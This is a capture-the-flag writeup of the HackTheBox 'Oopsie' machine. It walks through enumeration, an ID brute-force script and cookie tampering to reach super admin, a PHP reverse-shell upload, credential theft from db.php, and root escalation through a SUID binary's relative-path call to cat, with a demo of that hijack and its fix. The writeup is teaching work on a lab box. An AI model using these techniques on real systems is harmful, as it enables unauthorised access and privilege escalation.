HackTheBox - Oopsie Writeup

Box author | MrR3boot

Enumeration

  • Top 1000 ports scan
nmap -sC -sV -oN nmap/inital 10.10.10.28

/posts/htb/oopsie/2.png
nmap initial scan

  • all ports scan
nmap -sC -sV -p- -oN nmap/all_ports 10.10.10.28

/posts/htb/oopsie/3.png
nmap allports scan

  • Same result as the top-1000 scan
  • Open ports
    • port 22 / ssh
    • port 80 / http

The Website

/posts/htb/oopsie/4.png
MegaCorp Automotive webpage

Gobuster

  • Auto recon in the background
  • Looking for hidden directories
gobuster dir -u http://10.10.10.28 -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -o gobuster.log
  • The result

/posts/htb/oopsie/5.png
gobuster

The site has an upload directory.

Login Page

  • Found something interesting in the source code

/posts/htb/oopsie/6.png
view source code

  • The page loads a script from /cdn-cgi/login/script.js
  • Navigating to http://10.10.10.28/cdn-cgi/login
  • gives the login page

/posts/htb/oopsie/7.png
login page

  • Used the credentials recovered in the previous box, Archetype (from the official PDF)
  • Successfully logged in as admin

/posts/htb/oopsie/8.png
admin webpage

Can’t Upload

  • Navigate to the upload page
  • It says only the super admin has the right to view it

/posts/htb/oopsie/9.png
can't view upload page

The ID

/posts/htb/oopsie/10.png
id parameter

  • This page appears to be a user table keyed by the id parameter in the URL
  • Next step: a Python script to brute-force the IDs

Foothold/Gaining Access

Python Script

  • Python script for ID brute force
  • The admin cookies (user = access ID, role) are needed for authentication
  • An ID that maps to no account returns a page of a fixed size (3595 bytes here); anything else is worth a look

#!/usr/bin/env python3
# Brute-force the id parameter of the accounts page using the admin cookie.

import requests

BASE = "http://10.10.10.28/cdn-cgi/login/admin.php"
COOKIES = {'user': '34322', 'role': 'admin'}  # admin's access ID and role
EMPTY_LEN = 3595  # response size when the id maps to no account

for i in range(101):
    url = f"{BASE}?content=accounts&id={i}"
    r = requests.get(url, cookies=COOKIES)

    if len(r.content) == EMPTY_LEN:
        continue  # nothing appears for this id, skip it
    print(f"Check this ID out: {i}")
print("Done")
  • The result

/posts/htb/oopsie/11.png
brute-force id

  • The IDs that returned content map to the following accounts (in order)

{'access id':'34322','name':'admin','email':'[email protected]'}
{'access id':'8832','name':'john','email':'[email protected]'}
{'access id':'57633','name':'Peter','email':'[email protected]'}
{'access id':'28832','name':'Rafol','email':'[email protected]'}
{'access id':'xxxxx','name':'super admin','email':'[email protected]'}

Upload as super admin

  • Found the super admin table

/posts/htb/oopsie/12.png
found superadmin table

  • Turns out the Access ID is the value of the user cookie
  • Change the user cookie from the admin's access ID to the super admin's

/posts/htb/oopsie/13.png
admin cookie

before

/posts/htb/oopsie/14.png
superadmin cookie

after refresh the page

Reverse Shell

/posts/htb/oopsie/15.png
upload php reverse shell

  • Activated the reverse shell
    • through this link

/posts/htb/oopsie/16.png
execute the shell

  • Got the shell

/posts/htb/oopsie/17.png
shell as www-data

www-data

  • Found the credentials in file called db.php
  • in /var/www/html/cdn-cgi/login/db.php

/posts/htb/oopsie/18.png
found robert credentials

Robert

  • Login as robert

/posts/htb/oopsie/19.png
change user to robert

User Flag

/posts/htb/oopsie/20.png
user flag

  • Look for SUID binaries owned by root
  • The command to find them
find / -user root -perm -4000 -exec ls {} \; 2>/dev/null
  • Found an unusual binary that is not supposed to be there

/posts/htb/oopsie/21.png
find all SUID

Privilege Escalation

Bugtracker

  • Running the binary shows how it works
  • For the input given it fails with "No such file or directory", and the error comes from cat

/posts/htb/oopsie/22.png
cat error

  • Run strings on the binary
  • Turns out this binary calls the cat command
  • However it uses a relative path (cat, not /bin/cat), so whichever cat is found first in $PATH gets executed

/posts/htb/oopsie/23.png
strings bugtracker

  • The difference between relative and absolute paths

/posts/htb/oopsie/24.png
relative & absolute path differences

Relative Path Abused

  • Because the binary is SUID root and looks up cat through $PATH, a fake cat placed in a directory that comes first in $PATH runs with root's effective UID

/posts/htb/oopsie/25.png
shell as root
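The PATH abuse above, reproduced as an added example (not part of the original writeup and not the box's own binary): a stand-in script plays the role of bugtracker and reads a report through an unqualified cat, exactly the assumption the strings output supports. The fake cat only prints who it ran as; on the box the same trick with a shell in place of cat is what yields the root shell, since the real binary is SUID root. A fixed variant that calls /bin/cat by absolute path is included for contrast.

```shell
#!/bin/sh
# Added example, not code from the original writeup. Reproduces the bugtracker
# flaw with a stand-in script: "bugtracker" reads a report through an
# unqualified "cat", so whatever "cat" appears first in $PATH is executed.
# Assumption: the real binary behaves the same way (cat without a full path).
set -e

# Create a scratch directory with a report, the vulnerable stand-in, a fixed
# stand-in and a directory holding the attacker's fake cat. Sets global $work.
setup_demo() {
    work=$(mktemp -d)
    mkdir -p "$work/reports" "$work/bin"
    printf 'report 1: nothing interesting\n' > "$work/reports/1"

    # Vulnerable stand-in for the SUID binary (a plain script here, so no
    # privilege is gained in the demo; on the box it runs with euid 0).
    cat > "$work/bugtracker" <<EOF
#!/bin/sh
cat $work/reports/\$1
EOF
    chmod +x "$work/bugtracker"

    # Fixed stand-in: absolute path, so $PATH is never consulted.
    cat > "$work/bugtracker_fixed" <<EOF
#!/bin/sh
/bin/cat $work/reports/\$1
EOF
    chmod +x "$work/bugtracker_fixed"

    # Fake cat planted by the attacker. On the target this would be a copy
    # of /bin/sh (cp /bin/sh /tmp/cat) to get a root shell instead.
    cat > "$work/bin/cat" <<'EOF'
#!/bin/sh
echo "hijacked: cat ran as $(id -un) with args: $*"
EOF
    chmod +x "$work/bin/cat"
}

# Normal run: the real cat prints the report.
run_normal() {
    "$work/bugtracker" 1
}

# Hijacked run: the attacker's directory is prepended to PATH, so "cat"
# now resolves to the fake one. This is the relative-path abuse.
run_hijacked() {
    PATH="$work/bin:$PATH" "$work/bugtracker" 1
}

# Fixed run: same poisoned PATH, but /bin/cat is called by absolute path.
run_fixed() {
    PATH="$work/bin:$PATH" "$work/bugtracker_fixed" 1
}

setup_demo
echo "normal  : $(run_normal)"
echo "hijacked: $(run_hijacked)"
echo "fixed   : $(run_fixed)"
```

The only difference between the vulnerable and fixed stand-ins is the leading /bin/ in front of cat; a SUID program that spawns helpers should always use absolute paths (or reset PATH itself) because the caller controls the environment it inherits.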

Root Flag

/posts/htb/oopsie/26.png
root flag

Conclusion

I’ve learned a lot today. Never use the user ID as the cookie value (an attacker only has to guess another user's ID to become that user), and make sure the website's access control is configured properly. Lastly, configure SUID binaries carefully: do not set SUID on untrusted or unpatched programs, and call helper commands by absolute path so they cannot be hijacked through $PATH.

I had a fun time doing this machine and I hope you did too. Bye ;)